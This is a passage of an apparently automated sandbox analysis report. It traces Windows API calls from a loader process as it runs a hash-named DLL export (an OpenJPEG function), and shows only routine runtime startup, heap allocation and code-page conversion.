= pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13963 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13964 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13965 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13966 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13967 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13968 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13969 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13970 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13971 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13972 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 13973 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14029 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14030 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14031 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14032 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14033 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14034 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14035 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14036 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14037 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14038 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14039 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14040 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 14041 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 216 os_tid = 0xcd0 [0239.665] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.665] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0239.666] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0239.666] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0239.667] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.667] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0239.667] GetProcessHeap () returned 0x4a0000 [0239.667] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.668] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0239.668] GetLastError () returned 0x7e [0239.668] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0239.668] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0239.668] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c8) returned 0x4ac320 [0239.668] SetLastError (dwErrCode=0x7e) [0239.668] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1200) returned 0x4b3470 [0239.671] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0239.671] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0239.671] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0239.671] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0239.671] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info" [0239.671] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info" [0239.671] GetACP () returned 0x4e4 [0239.671] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x228) returned 0x4a5380 [0239.671] IsValidCodePage (CodePage=0x4e4) returned 1 [0239.671] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0239.671] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0239.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.671] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0239.671] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0239.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0239.672] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.672] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0239.672] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0239.672] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0239.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0239.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.672] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0239.672] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0239.672] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0239.672] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0239.672] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100) returned 0x4b2170 [0239.673] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0239.673] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x176) returned 0x4a9aa0 [0239.673] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0239.673] GetLastError () returned 0x0 [0239.673] SetLastError (dwErrCode=0x0) [0239.673] GetEnvironmentStringsW () returned 0x4b4680* [0239.673] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9cc) returned 0x4b5060 [0239.673] FreeEnvironmentStringsW (penv=0x4b4680) returned 1 [0239.673] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x118) returned 0x4aa590 [0239.673] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3e) returned 0x4b0c20 [0239.673] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x5c) returned 0x4a0780 [0239.673] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x62) returned 0x4a4c00 [0239.673] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x78) returned 0x4ac6f0 [0239.673] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x62) returned 0x4a5a40 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x28) returned 0x4ab560 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x48) returned 0x4b0a40 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1a) returned 0x4ab9e0 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3a) returned 0x4b0400 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x62) returned 0x4a4970 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2a) returned 0x4ac770 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2e) returned 0x4a4c70 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1c) returned 0x4ab7a0 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xd2) returned 0x4a5cd0 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x7c) returned 0x4a4000 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3a) returned 0x4affa0 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x90) returned 0x4a3c20 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x24) returned 0x4ab590 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x30) returned 0x4a49e0 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x36) returned 0x4a5ab0 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c) returned 0x4b0090 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x52) returned 0x4a9500 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c) returned 0x4b09a0 [0239.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xd6) returned 0x4a5610 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2e) returned 0x4a20d0 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1e) returned 0x4ab5c0 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4a2110 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x54) returned 0x4a9140 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x52) returned 0x4a9560 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x24) returned 0x4ab8f0 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x42) returned 0x4b0310 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4a2150 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x44) returned 0x4b0720 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x24) returned 0x4ab950 [0239.675] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5060 | out: hHeap=0x4a0000) returned 1 [0239.675] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1000) returned 0x4b4680 [0239.675] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0239.675] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0239.675] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" 